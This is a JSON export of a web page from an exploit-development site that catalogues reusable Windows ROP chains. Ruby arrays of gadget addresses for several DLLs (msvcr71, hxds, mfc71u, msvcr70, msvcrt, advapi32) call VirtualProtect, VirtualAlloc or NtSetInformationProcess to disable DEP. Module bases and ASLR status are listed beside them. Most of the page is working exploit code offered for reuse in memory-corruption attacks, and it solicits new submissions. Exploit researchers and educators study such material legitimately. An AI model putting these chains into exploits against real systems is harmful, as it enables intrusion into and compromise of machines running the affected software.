{"id":15026,"date":"2026-03-12T21:03:28","date_gmt":"2026-03-12T20:03:28","guid":{"rendered":"https:\/\/www.corelan.be\/?page_id=15026"},"modified":"2026-03-12T21:03:30","modified_gmt":"2026-03-12T20:03:30","slug":"corelan-ropdb","status":"publish","type":"page","link":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","title":{"rendered":"Corelan ROPdb"},"content":{"rendered":"\n<p>This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll.<\/p>\n\n\n\n<p>The main requirements for a ROP chain to be listed here are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>it must work on XP, Vista, Windows 7, 2003 and 2008 server. (the dll should not rebase and should not be ASLR enabled). If your ROP chain only works on one of the listed operating systems, it must be based on a commonly used module.\u00a0<\/li>\n\n\n\n<li>the chain should be null byte free (unless it\u2019s a common module which contains null bytes). Of course, ROP chains that contains null bytes (or other bad chars) will\/might be shorter.\u00a0<\/li>\n\n\n\n<li>the chain should work without any particular setup in terms of preparing registers or assuming that a register contains a given value.\u00a0<\/li>\n\n\n\n<li>you must be the original author of the chain\u00a0<\/li>\n<\/ul>\n\n\n\n<p>Ideally, the dll should be not application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;<a href=\"https:\/\/tst123.corelan.be\/index.php\/security\/corelan-ropdb\/#\">&nbsp;web browser<\/a>.<\/p>\n\n\n\n<p>If you want to submit your own chain, make sure to include details about the module (name, version, applications it gets shipped with), and indicate if and how the dll can be loaded on demand (if applicable).<\/p>\n\n\n\n<p>Write your chain in the format shown below (ruby) and send it to peter [dot] ve {at} corelan [dot] be<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">msvcr71.dll \u2013 v7.10.3052.4<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shipped with : JRE (Java) 1.6<\/li>\n\n\n\n<li>works on : XP\/Vista\/Win7\/2003\/2008\u00a0<\/li>\n\n\n\n<li>Load on demand in browser : YES\u00a0<\/li>\n\n\n\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x7c340000\u00a0<\/li>\n\n\n\n<li>Top : 0x7c396000\u00a0<\/li>\n\n\n\n<li>Size : 0x56000\u00a0<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()\u00a0<\/li>\n\n\n\n<li>Author : corelanc0d3r\u00a0<\/li>\n<\/ul>\n\n\n\n<p>Updated (smaller) chain (oct 2011):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n[\n\t0x7c37653d, \t# POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\n\t0xfffffdff,\t# Value to negate, will become 0x00000201 (dwSize)\n\t0x7c347f98,\t# RETN (ROP NOP) [msvcr71.dll]\n\t0x7c3415a2,\t# JMP [EAX] [msvcr71.dll]\n\t0xffffffff,\t# \n\t0x7c376402,\t# skip 4 bytes [msvcr71.dll]\n\t0x7c351e05,\t# NEG EAX # RETN [msvcr71.dll] \n\t0x7c345255,\t# INC EBX # FPATAN # RETN [msvcr71.dll] \n\t0x7c352174,\t# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] \n\t0x7c344f87,\t# POP EDX # RETN [msvcr71.dll] \n\t0xffffffc0,\t# Value to negate, will become 0x00000040\n\t0x7c351eb1,\t# NEG EDX # RETN [msvcr71.dll] \n\t0x7c34d201,\t# POP ECX # RETN [msvcr71.dll] \n\t0x7c38b001,\t# &amp;Writable location [msvcr71.dll]\n\t0x7c347f97,\t# POP EAX # RETN [msvcr71.dll] \n\t0x7c37a151,\t# ptr to &amp;VirtualProtect() - 0x0EF [IAT msvcr71.dll]\n\t0x7c378c81,\t# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] \n\t0x7c345c30,\t# ptr to 'push esp #  ret ' [msvcr71.dll]\n\t# rop chain generated with mona.py\n].pack(\"V*\")<\/pre>\n\n\n\n<p><em>(18 dwords)<\/em><\/p>\n\n\n\n<p>Older (bigger) chain:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets =\n[\n\t0x7c376402,\t# POP EBP # RETN [msvcr71.dll] \n\t0x7c376402,\t# skip 4 bytes [msvcr71.dll]\n\t0x7c347f97,\t# POP EAX # RETN [msvcr71.dll] \n\t0xfffffdff,\t# Value to negate, will become 0x00000201 (dwSize)\n\t0x7c351e05,\t# NEG EAX # RETN [msvcr71.dll] \n\t0x7c354901,\t# POP EBX # RETN [msvcr71.dll] \n\t0xffffffff,\t#  \n\t0x7c345255,\t# INC EBX # FPATAN # RETN [msvcr71.dll] \n\t0x7c352174,\t# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] \n\t0x7c344f87,\t# POP EDX # RETN [msvcr71.dll] \n\t0xffffffc0,\t# Value to negate, will become 0x00000040\n\t0x7c351eb1,\t# NEG EDX # RETN [msvcr71.dll] \n\t0x7c34d201,\t# POP ECX # RETN [msvcr71.dll] \n\t0x7c38b001,\t# &amp;Writable location [msvcr71.dll]\n\t0x7c34b8d7,\t# POP EDI # RETN [msvcr71.dll] \n\t0x7c347f98,\t# RETN (ROP NOP) [msvcr71.dll]\n\t0x7c364802,\t# POP ESI # RETN [msvcr71.dll] \n\t0x7c3415a2,\t# JMP [EAX] [msvcr71.dll]\n\t0x7c347f97,\t# POP EAX # RETN [msvcr71.dll] \n\t0x7c37a151,\t# ptr to &amp;VirtualProtect() - 0x0EF [IAT msvcr71.dll]\n\t0x7c378c81,\t# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] \n\t0x7c345c30,\t# ptr to 'push esp #  ret ' [msvcr71.dll]\n\t# rop chain generated with mona.py\n].pack(\"V*\")<\/pre>\n\n\n\n<p><em>(22 dwords)<\/em><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">hxds.dll \u2013 v2.05.50727.4039<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shipped with : MS Office 2010<\/li>\n\n\n\n<li>works on : XP\/Vista\/Win7\/2003\/2008\u00a0<\/li>\n\n\n\n<li>Load on demand in browser : YES\u00a0 (\u00a0<a href=\"http:\/\/www.greyhathacker.net\/?p=585\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/www.greyhathacker.net\/?p=585<\/a>\u00a0)<\/li>\n\n\n\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x51BD0000<\/li>\n\n\n\n<li>Top : 0x51CA7000<\/li>\n\n\n\n<li>Size : 0xd7000\u00a0<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()\u00a0<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">def create_rop_chain(base_hxds.dll)\n\t# rop chain generated with mona.py - www.corelan.be\n\trop_gadgets = \n\t[\n\t\tbase_hxds.dll + 0x00074533,\t# POP ESI # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x000010b8,\t# ptr to &amp;VirtualProtect() [IAT hxds.dll]\n\t\tbase_hxds.dll + 0x00002d97,\t# MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x0000cba0,\t# XCHG EAX,ESI # RETN 00 [hxds.dll] \n\t\tbase_hxds.dll + 0x0006a894,\t# POP EBP # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x0002c595,\t# &amp; call esp [hxds.dll]\n\t\tbase_hxds.dll + 0x00076452,\t# POP EAX # RETN [hxds.dll] \n\t\t0xa17ffdfe,                \t# put delta into eax (-&gt; put 0x00000201 into ebx)\n\t\tbase_hxds.dll + 0x00041e01,\t# ADD EAX,5E800403 # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x0002e67b,\t# ADD EBX,EAX # XOR EAX,EAX # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x00076452,\t# POP EAX # RETN [hxds.dll] \n\t\t0xa17ffc3d,                \t# put delta into eax (-&gt; put 0x00000040 into edx)\n\t\tbase_hxds.dll + 0x00041e01,\t# ADD EAX,5E800403 # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x0002592b,\t# XCHG EAX,EDX # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x00017be7,\t# POP ECX # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x000906e7,\t# &amp;Writable location [hxds.dll]\n\t\tbase_hxds.dll + 0x0002dd01,\t# POP EDI # RETN [hxds.dll] \n\t\tbase_hxds.dll + 0x00013a03,\t# RETN (ROP NOP) [hxds.dll]\n\t\tbase_hxds.dll + 0x00074707,\t# POP EAX # RETN [hxds.dll] \n\t\t0x90909090,                \t# nop\n\t\tbase_hxds.dll + 0x0000a8dc,\t# PUSHAD # POP ECX # RETN [hxds.dll] \n\t].flatten.pack(\"V*\")\n\treturn rop_gadgets\nend<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">mfc71u.dll \u2013 v7.10.3077.0<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x7c250000\u00a0<\/li>\n\n\n\n<li>Top : 0x7c352000\u00a0<\/li>\n\n\n\n<li>Size : 0x102000\u00a0<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()\u00a0<\/li>\n\n\n\n<li>Author : corelanc0d3r\u00a0<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets =\n\t[\n\t0x7c259e0c,\t# POP ECX # RETN (MFC71U.DLL)\n\t0x7c2512f0,\t# &lt;- *&amp;VirtualProtect()\n\t0x7c2fe7bc,\t# MOV EAX,DWORD PTR DS:[ECX] # RETN (MFC71U.DLL)\n\t0x7c26f014,\t# XCHG EAX,ESI # RETN (MFC71U.DLL)\n\t0x7c2c0809,\t# POP EBP # RETN (MFC71U.DLL)\n\t0x7c289989,\t# ptr to 'jmp esp' (from MFC71U.DLL)\n\t0x7c259e0c,\t# POP ECX # RETN (MFC71U.DLL)\n\t0x7c32b001,\t# RW pointer (lpOldProtect) (-&gt; ecx)\n\t0x7c2de810,\t# POP EDI # RETN (MFC71U.DLL)\n\t0x7c2de811,\t# ROP NOP (-&gt; edi)\n\t0x7c284862,\t# POP EAX # RETN (MFC71U.DLL)\n\t0xffffffc0,\t# value to negate, target 0x00000040, -&gt; reg : edx, via ebx\n\t0x7c252ea0,\t# NEG EAX # RETN (MFC71U.DLL)\n\t0x7c316b89,\t# XCHG EAX,EBX # RETN (MFC71U.DLL)\n\t0x7c288c52,\t# XOR EDX,EDX # RETN (MFC71U.DLL)\n\t0x7c265297,\t# ADD EDX,EBX # POP EBX # RETN 10 (MFC71U.DLL)\n\t0x41414141,\t# EBX\n\t0x7c284862,\t# POP EAX # RETN (MFC71U.DLL)\n\t0x41414141,\n\t0x41414141,\n\t0x41414141,\n\t0x41414141, \t# compensate for RETN 10\n\t0xfffffdff,\t# value to negate, target 0x00000201, target reg : ebx\n\t0x7c252ea0,\t# NEG EAX # RETN (MFC71U.DLL)\n\t0x7c316b89,\t# XCHG EAX,EBX # RETN (MFC71U.DLL) (dwSize)\n\t0x7c284862,\t# POP EAX # RETN (MFC71U.DLL)\n\t0x90909090,\t# NOPS (-&gt; eax)\n\t0x7c2838ef,\t# PUSHAD # RETN (MFC71U.DLL)\n\t# rop chain generated with mona.py\n\t].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">msvcr70.dll \u2013 v7.00.9466.0<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tested on: XP\/Win7<\/li>\n\n\n\n<li>Rebase : False<\/li>\n\n\n\n<li>ASLR : False<\/li>\n\n\n\n<li>Safeseh : False<\/li>\n\n\n\n<li>Base : 0x7c000000<\/li>\n\n\n\n<li>Top : 0x7c054000<\/li>\n\n\n\n<li>Size : 0x00054000<\/li>\n\n\n\n<li>Technique : kernel32.VirtualProtect()<\/li>\n\n\n\n<li>Author : b33f (Ruben Boonen) \u2013\u00a0<a href=\"http:\/\/www.fuzzysecurity.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">www.fuzzysecurity.com<\/a><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n[\n\t0x7c032c80, # XOR EAX,EAX # RETN\n\t0x7c0126bc, # XCHG EAX,EBP # ADD AL,7C # RETN\n\t0x7c026652, # POP ESI # RETN\n\t0xffffffff, # will be 0x00000000\n\t0x7c03063f, # INC ESI # RETN\n\t0x7c0358a1, # POP EAX # RETN\n\t0x7C0390FD, # VirtualProtect() -&gt; ESI=0 EBP=0 -&gt; 7c039138(VP)-3B\n\t0x7c023a4f, # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN\n\t0x7c0358a1, # POP EAX # RETN\n\t0x83FF5E94, # neg -&gt; 0x7c00a16c : push esp #  ret\n\t0x7c0167cd, # NEG EAX # RETN\n\t0x7c0126b7, # XCHG EAX,EBP # ADD AL,7C # RETN\n\t0x7c03028f, # POP EBX # RETN\n\t0xffffffff, # will be 0x00000000\n\t0x7c01cd53, # INC EBX # XOR AL,AL # RETN\n\t0x7c0358a1, # POP EAX # RETN\n\t0xFFFFFDFF, # Neg is 201-HEX (513-bytes)\n\t0x7c0167cd, # NEG EAX # RETN\n\t0x7c01561c, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\n\t0x7c026484, # POP EDI # RETN\n\t0x7c034e02, # ROP-NOP\n\t0x7c0358a1, # POP EAX # RETN\n\t0xFFFFFFC0, # NEG is 0x40\n\t0x7c0167cd, # NEG EAX # RETN\n\t0x7c026dc4, # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN\n\t0x7c034e01, # POP ECX # RETN\n\t0x7c049001, # lpOldProtect\n\t0x7c0358a1, # POP EAX # RETN\n\t0x90909090, # NOP\n\t0x7c0126b6, # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN\n].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Less generic chains<\/h2>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">msvcrt.dll \u2013 v7.0.2600.5512 (XP)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Rebase: False<\/li>\n\n\n\n<li>ASLR: False<\/li>\n\n\n\n<li>Safeseh : True<\/li>\n\n\n\n<li>Base: 0x77c10000<\/li>\n\n\n\n<li>Top: 0x77c68000<\/li>\n\n\n\n<li>Size: 0x00058000<\/li>\n\n\n\n<li>works on: XP<\/li>\n\n\n\n<li>Technique: kernel.VirtualProtect() and kernel.VirtualAlloc()<\/li>\n<\/ul>\n\n\n\n<p>VirtualProtect (NOT null-byte free)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n\t[\n\t0x77c364d5,\t# POP EBP # RETN [msvcrt.dll] \n\t0x77c364d5,\t# skip 4 bytes [msvcrt.dll]\n\t0x77c46e91,\t# POP EBX # RETN [msvcrt.dll] \n\t0x00000201,\t# 0x00000201-&gt; ebx\n\t0x77c4cbf9,\t# POP EDX # RETN [msvcrt.dll] \n\t0x00000040,\t# 0x00000040-&gt; edx\n\t0x77c2c343,\t# POP ECX # RETN [msvcrt.dll] \n\t0x77c605b5,\t# &amp;Writable location [msvcrt.dll]\n\t0x77c23b47,\t# POP EDI # RETN [msvcrt.dll] \n\t0x77c39f92,\t# RETN (ROP NOP) [msvcrt.dll]\n\t0x77c34d9a,\t# POP ESI # RETN [msvcrt.dll] \n\t0x77c2aacc,\t# JMP [EAX] [msvcrt.dll]\n\t0x77c21d16,\t# POP EAX # RETN [msvcrt.dll] \n\t0x77c11120,\t# ptr to &amp;VirtualProtect() [IAT msvcrt.dll]\n\t0x77c12df9,\t# PUSHAD # RETN [msvcrt.dll] \n\t0x77c35524,\t# ptr to 'push esp #  ret ' [msvcrt.dll]\n\t# rop chain generated with mona.py\n\t].pack(\"V*\")<\/pre>\n\n\n\n<p>VirtualAlloc: (NOT null-byte free)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n\t[\n\t0x77c30ae3,\t# POP EBP # RETN [msvcrt.dll] \n\t0x77c30ae3,\t# skip 4 bytes [msvcrt.dll]\n\t0x77c461c1,\t# POP EBX # RETN [msvcrt.dll] \n\t0x00000001,\t# 0x00000001-&gt; ebx\n\t0x77c4cdec,\t# POP EDX # RETN [msvcrt.dll] \n\t0x00001000,\t# 0x00001000-&gt; edx\n\t0x77c3eb23,\t# POP ECX # RETN [msvcrt.dll] \n\t0x00000040,\t# 0x00000040-&gt; ecx\n\t0x77c3048a,\t# POP EDI # RETN [msvcrt.dll] \n\t0x77c39f92,\t# RETN (ROP NOP) [msvcrt.dll]\n\t0x77c4c1d1,\t# POP ESI # RETN [msvcrt.dll] \n\t0x77c2aacc,\t# JMP [EAX] [msvcrt.dll]\n\t0x77c4e392,\t# POP EAX # RETN [msvcrt.dll] \n\t0x77c1110c,\t# ptr to &amp;VirtualAlloc() [IAT msvcrt.dll]\n\t0x77c12df9,\t# PUSHAD # RETN [msvcrt.dll] \n\t0x77c354b4,\t# ptr to 'push esp #  ret ' [msvcrt.dll]\n\t# rop chain generated with mona.py\n\t].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">msvcrt.dll \u2013 v7.0.3790.3959 (Windows 2003 SP1 &amp; SP2)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OS Module<\/li>\n\n\n\n<li>Chain works on : Windows 2003 SP1 &amp; SP2<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets =\n\t[\n\t0x77bb2563, # POP EAX # RETN\n\t0x77ba1114, # &lt;- *&amp;VirtualProtect()\n\t0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\n\tjunk,\n\t0x77bb0c86, # XCHG EAX,ESI # RETN\n\t0x77bc9801, # POP EBP # RETN\n\t0x77be2265, # ptr to 'push esp #  ret'\n\t0x77bb2563, # POP EAX # RETN\n\t0x03C0990F,\n\t0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -&gt; ebx)\n\t0x77bb48d3, # POP EBX, RET\n\t0x77bf21e0, # .data\n\t0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\n\t0x77bbfc02, # POP ECX # RETN\n\t0x77bef001, # W pointer (lpOldProtect) (-&gt; ecx)\n\t0x77bd8c04, # POP EDI # RETN\n\t0x77bd8c05, # ROP NOP (-&gt; edi)\n\t0x77bb2563, # POP EAX # RETN\n\t0x03c0944f,\n\t0x77bdd441, # SUB EAX, 03c0940f  \n\t0x77bb8285, # XCHG EAX,EDX # RETN\n\t0x77bb2563, # POP EAX # RETN\n\tnop,\n\t0x77be6591, # PUSHAD # ADD AL,0EF # RETN\n\t].pack(\"V*\")<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">advapi32.dll \u2013 5.1.2600.5755&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OS Module\u00a0<\/li>\n\n\n\n<li>Chain works on : XP (SP3)\u00a0<\/li>\n\n\n\n<li>Rebase : False\u00a0<\/li>\n\n\n\n<li>ASLR : False\u00a0<\/li>\n\n\n\n<li>Safeseh : True\u00a0<\/li>\n\n\n\n<li>Base : 0x77dd0000\u00a0<\/li>\n\n\n\n<li>Top : 0x77e6b000\u00a0<\/li>\n\n\n\n<li>Size : 0x9b000\u00a0<\/li>\n\n\n\n<li>Technique : ntdll.ZwSetInformationProcess()\u00a0<\/li>\n\n\n\n<li>Author : corelanc0d3r\u00a0<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">rop_gadgets = \n\t[\n\t0x77e25c1f, # POP EAX # RETN\n\t0x77dd1404, # * &amp;NtSetInformationProcess\n\t0x77dfd448, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04 \n\t0xffffffff, # (EBP)\n\t0x77e18a5f, # INC EBP # RETN (set EBP to 0)\n\t0x41414141, # junk (compensate)\n\t0x77e01143, # XOR EBP,EAX # RETN\t\n\t0x77e25c1f, # POP EAX # RETN \n\t0xffffffde, # -&gt; 0x22 -&gt; EDX\n\t0x77dd9b16, # NEG EAX # RETN \n\t0x77df563a, # XCHG EAX,EBX # RETN \n\t0x77de97ac, # MOV EDX,EBX # POP ESI # POP EBX # RETN 10 \n\t0x77e3cb79, # RETN -&gt; ESI\n\t0xffffffff, # -&gt; EBX\n\t0x77ddbf44, # POP ECX # RETN \n\t0x41414141, # compensate\n\t0x41414141, # compensate\n\t0x41414141, # compensate\n\t0x41414141, # compensate\n\t0x77e4b1fc, # ptr to 0x02\n\t0x77e25c1f, # POP EAX # RETN\n\t0xfffffffc, # -&gt; 0x4\n\t0x77dd9b16, # NEG EAX # RETN\n\t0x77e3cb78, # POP EDI # RETN\t\n\t0x77e3cb79, # RETN\n\t0x77de75ed, # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN \n\t].pack(\"V*\")<\/pre>\n\n\n\n<p>Note : the IAT entry in advapi32.dll (NtSetInformationProcess() at 0x77dd1404) is static on all versions os XP<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll. The main requirements for a ROP chain to be listed here are: Ideally, the dll should be not application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;&nbsp;web browser. &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Corelan ROPdb\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-15026","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll. The main requirements for a ROP chain to be listed here are: Ideally, the dll should be not application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;&nbsp;web browser. &hellip; Continue reading &quot;Corelan ROPdb&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-12T20:03:30+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/\",\"name\":\"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"datePublished\":\"2026-03-12T20:03:28+00:00\",\"dateModified\":\"2026-03-12T20:03:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/corelan-ropdb\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Corelan ROPdb\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","og_locale":"en_US","og_type":"article","og_title":"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"This page gathers generic\/universal ROP chains that are solely based on gadgets taken from a single dll. The main requirements for a ROP chain to be listed here are: Ideally, the dll should be not application specific, unless it\u2019s shipped with a major application and\/or has the option to get loaded from f.i. a&nbsp;&nbsp;web browser. &hellip; Continue reading \"Corelan ROPdb\"","og_url":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_modified_time":"2026-03-12T20:03:30+00:00","twitter_card":"summary_large_image","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","url":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/","name":"Corelan ROPdb - Corelan | Exploit Development &amp; Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"datePublished":"2026-03-12T20:03:28+00:00","dateModified":"2026-03-12T20:03:30+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/corelan-ropdb\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Corelan ROPdb"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse 